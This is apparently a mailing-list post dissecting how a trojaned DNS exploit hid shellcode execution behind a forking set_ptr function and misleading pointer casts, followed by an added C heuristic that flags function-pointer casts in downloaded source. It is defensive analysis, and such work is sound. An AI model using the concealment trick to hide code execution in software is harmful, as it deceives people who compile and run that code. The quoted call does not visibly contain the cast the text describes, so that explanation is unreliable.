Below I have excerpted the obvious pieces of the trojan.  The functions
which do the deed are set_ptr, and the call to dnsprintflabel.

I just thought some people may have wanted to know how the person who
wrote the trojan hid the shellcode among the seemingly correct exploit.

--Perry

***
*** set_ptr does the fork dance.
***

int
set_ptr(char *buff, int offset, unsigned long val, int s)
{

                if (!fork())

***
*** After the above fork, child does meaningless memcpy and
*** returns to main, causing multiple executions of the trojan
*** shellcode.
***

        memcpy(buff, copy_buff, sizeof(copy_buff));
        return 0;
}

***
*** dnsprintflabel has a lot of crap code in it, but it
*** isn't this function that does the deed, it's the
*** arguments to the function.
***

/* pull out a compressed query name */
char           *
dnsprintflabel(char *s, char *buf, char *p)
{
        return (p);
}


***
*** This is the actual code that does the running of the shellcode.
*** In it he hides a lot of useless casts to hide the inline prototype
*** of the call to the shellcode.
***

        /*
         * encode packet ...
         */
        dnsprintflabel(remote_addr, (char *) (expl_buffer + sizeof(HEADER)),
                 (char *) ((unsigned long) &expl_buffer[0] + sizeof(HEADER) + 1));
                 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
                 |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||

                 This is the carefully typecasted prototype for the shellcode, he
                 just skips all the header and pointer crap to actually run the
                 shellcode.  The &expl_buffer[0] + sizeof(HEADER) + 1 is actually
                 just the shellcode he copied from the buffers above, hidden behind
                 some custom types and stuff.

                 EXPLANATION: The & dereference just returns the pointer of the array
                 element at the calculated offset (sizeof(HEADER) +1).  The thing that
                 gives this away as a function call is the extra set of parentheses
                 after the typecast, this is the lexicon for an inline function typecast.


--
Perry Harrington                 Director of                   zelur xuniL  ()
[EMAIL PROTECTED]             System Architecture               Think Blue.  /\
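The audit heuristic below is an added example, not Perry's code and not part of the trojaned exploit. It turns the two giveaways described above into something a reviewer can run over a downloaded source file before compiling it: a function-pointer declarator "(*)" inside a cast (the hidden prototype), and a ')' followed by '(' where the ')' does not close a plain pointer type such as (char *) (the "extra set of parentheses after the typecast"). The SAMPLE string is constructed for the demonstration and does not reproduce the real exploit; HEADER, buf, fn and dnsprintflabel in it are only names.

```c
#include <stdio.h>
#include <string.h>

/* Constructed sample source (not the trojan's code): two harmless casts,
 * one function-pointer cast, and one call made through a cast. */
static const char SAMPLE[] =
    "/* constructed sample, not the trojan's code */\n"
    "char *p = (char *) (buf + sizeof(HEADER) + 1);\n"
    "n = dnsprintflabel(addr, (char *) (buf + 1), p);\n"
    "fn = (void (*)(void)) (buf + sizeof(HEADER) + 1);\n"
    "((void (*)(void)) (buf + sizeof(HEADER) + 1))();\n"
    "return 0;\n";

/* Does the line hold a function-pointer declarator "(*)"?  A cast that
 * contains one is a cast to a function type: the compiler will then emit
 * a call through whatever address the operand evaluates to. */
static int has_fnptr_declarator(const char *line, size_t len)
{
    for (size_t i = 0; i + 2 < len; i++)
        if (line[i] == '(' && line[i + 1] == '*' && line[i + 2] == ')')
            return 1;
    return 0;
}

/* Does the line contain ')' followed (ignoring blanks) by '(' where the
 * ')' does not close a plain pointer type such as (char *)?  That is the
 * "extra set of parentheses after the typecast": an argument list applied
 * to a parenthesised expression, or a parenthesised operand after a
 * non-pointer cast.  Known false positive: "if (c) (void) f();". */
static int has_paren_call(const char *line, size_t len)
{
    for (size_t i = 0; i < len; i++) {
        if (line[i] != ')')
            continue;
        size_t b = i;
        while (b > 0 && (line[b - 1] == ' ' || line[b - 1] == '\t'))
            b--;
        if (b > 0 && line[b - 1] == '*')
            continue;                       /* closes (T *): a data cast */
        size_t a = i + 1;
        while (a < len && (line[a] == ' ' || line[a] == '\t'))
            a++;
        if (a < len && line[a] == '(')
            return 1;
    }
    return 0;
}

/* Scan src line by line; store the 1-based numbers of flagged lines in
 * out (at most max of them) and return the total number flagged. */
int flag_suspicious_lines(const char *src, int *out, int max)
{
    int lineno = 1, count = 0;
    const char *line = src;
    while (*line) {
        const char *nl = strchr(line, '\n');
        size_t len = nl ? (size_t)(nl - line) : strlen(line);
        if (has_fnptr_declarator(line, len) || has_paren_call(line, len)) {
            if (count < max)
                out[count] = lineno;
            count++;
        }
        if (!nl)
            break;
        line = nl + 1;
        lineno++;
    }
    return count;
}

/* Convenience wrappers: how many lines were flagged, and the n-th flagged
 * line number (1-based n), or 0 if there is no such line. */
int count_suspicious(const char *src)
{
    int tmp[64];
    return flag_suspicious_lines(src, tmp, 64);
}

int nth_suspicious(const char *src, int n)
{
    int tmp[64];
    int c = flag_suspicious_lines(src, tmp, 64);
    return (n >= 1 && n <= c && n <= 64) ? tmp[n - 1] : 0;
}

int main(void)
{
    int hits[16];
    int n = flag_suspicious_lines(SAMPLE, hits, 16);
    printf("%d suspicious line(s):", n);
    for (int i = 0; i < n && i < 16; i++)
        printf(" %d", hits[i]);
    printf("\n");
    return 0;
}
```

On the constructed sample this reports lines 4 and 5 and passes the two (char *) casts on lines 2 and 3. It is a line-oriented heuristic, not a parser, so treat a hit as "read this line by hand", not as proof of a trojan.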
